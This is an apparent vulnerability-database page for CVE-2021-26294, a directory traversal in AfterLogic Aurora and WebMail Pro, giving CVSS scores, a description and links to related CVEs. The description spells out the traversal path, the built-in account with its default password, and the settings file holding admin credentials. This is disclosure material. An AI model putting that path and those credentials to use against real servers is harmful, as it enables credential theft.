Published: 07/03/2021 Updated: 11/03/2021

CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10

CVSS v3 Base Score: 7.5 | Impact Score: 3.6 | Exploitability Score: 3.9

VMScore: 446

Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N

An issue exists in AfterLogic Aurora up to and including 7.7.9 and WebMail Pro up to and including 7.7.9. They allow directory traversal to read files (such as a data/settings/settings.xml file containing admin panel credentials), as demonstrated by dav/server.php/files/personal/%2e%2e when using the caldav_public_user account (with caldav_public_user as its password).

Vulnerable Product	Search on Vulmon	Subscribe to Product
afterlogic aurora
afterlogic webmail pro

AfterLogic Products Vulnerabilities

AfterLogic related CVEs discovered by E3SEC CVE-2021-26292 - Public Full Path Disclosure on AfterLogic Aurora & WebMail Pro WebDAV EndPoint CVE-2021-26293 - [98 CRITICAL] RCE via Public unrestricted upload with path traversal on AfterLogic Aurora & WebMail Pro WebDAV EndPoint CVE-2021-26294 - [75 HIGH] Exposure of sensitive information to an unauthorized

Directory Traversal in Afterlogic webmail aurora and pro

CVE-2021-26294 Exploit Directory Traversal in Afterlogic webmail aurora and pro Description: AfterLogic Aurora and WebMail Pro products with 779 and all lower versions are affected by this vulnerability, simply sending an HTTP GET request to WebDAV EndPoint with built-in “caldav_public_user@localhost” and it’s the predefined password “caldav_public_u

CWE-22 https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26294-exposure-of-sensitive-information-vulnerability.md https://nvd.nist.gov https://github.com/E3SEC/AfterLogic

CVE-2021-26294

Vulnerability Summary

Vulnerability Trend

Github Repositories

References

Vulmon Search

About

Products

Connect